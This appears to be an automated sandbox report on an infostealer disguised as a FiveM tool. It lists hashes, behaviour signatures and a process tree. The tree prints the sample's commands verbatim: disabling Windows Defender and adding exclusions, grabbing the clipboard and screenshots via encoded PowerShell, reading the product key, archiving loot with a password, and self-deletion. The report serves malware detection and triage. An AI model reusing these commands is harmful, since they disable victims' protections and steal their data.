Analysis

  • max time kernel
    144s
  • max time network
    95s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-12-2024 11:11

General

  • Target

    fivem s7b/start.exe

  • Size

    21.6MB

  • MD5

    3d50186ac66012eb0c6e4d813bfcb414

  • SHA1

    83102ec1333678be19a39406d53dbc89fcc25115

  • SHA256

    598f12da38e0b270f3e6698112afbd1dc162b7779a6690dd11d40a6388126d8a

  • SHA512

    b76d616aa1fe1b160d234babdc533723a1366771b647db211a56ab9a0bba4010db5aeb86fb59359b608b0bf34ac86001d1db3ca9bec56c63bb5fa429c0e3ff05

  • SSDEEP

    393216:1aDW1AzdtCCE62fkYCicgcT/ByQVZVEt9tF7mHzqktrIHziK1piXLGVE4Ue9VJr:GW1ATCiEk1J/vVZV2/wmktuDiXHi9Lr

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 54 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe
    "C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe
      "C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4344
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3276
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1356
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1124
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2528
          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            bound.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:804
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1176
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3468
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3504
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:1816
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:4428
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3988
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:2132
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:4608
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:1340
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe"
              4⤵
              • Views/modifies file attributes
              PID:4672
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4816
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4224
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:4512
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:4368
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:1852
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:432
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:244
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:2124
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4948
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:1936
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:2948
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:1900
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:2212
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3924
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ljryjyot\ljryjyot.cmdline"
                              5⤵
                                PID:4024
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD551.tmp" "c:\Users\Admin\AppData\Local\Temp\ljryjyot\CSCE1CD22C454434B72A522AE6F796D8914.TMP"
                                  6⤵
                                    PID:2072
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:4524
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:1968
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:648
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3948
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1616
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1692
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2796
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:1948
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:3600
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  4⤵
                                                    PID:1124
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:1644
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                    3⤵
                                                      PID:3408
                                                      • C:\Windows\system32\getmac.exe
                                                        getmac
                                                        4⤵
                                                          PID:2828
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10362\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\RZkO4.zip" *"
                                                        3⤵
                                                          PID:4896
                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI10362\rar.exe
                                                            C:\Users\Admin\AppData\Local\Temp\_MEI10362\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\RZkO4.zip" *
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:2256
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          3⤵
                                                            PID:3720
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic os get Caption
                                                              4⤵
                                                                PID:3988
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                              3⤵
                                                                PID:2720
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic computersystem get totalphysicalmemory
                                                                  4⤵
                                                                    PID:72
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                  3⤵
                                                                    PID:4936
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic csproduct get uuid
                                                                      4⤵
                                                                        PID:1944
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                      3⤵
                                                                        PID:4992
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:2044
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                        3⤵
                                                                          PID:1968
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic path win32_VideoController get name
                                                                            4⤵
                                                                            • Detects videocard installed
                                                                            PID:248
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                          3⤵
                                                                            PID:2092
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                              4⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:720
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\fivem s7b\start.exe""
                                                                            3⤵
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            PID:2128
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping localhost -n 3
                                                                              4⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:5060

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

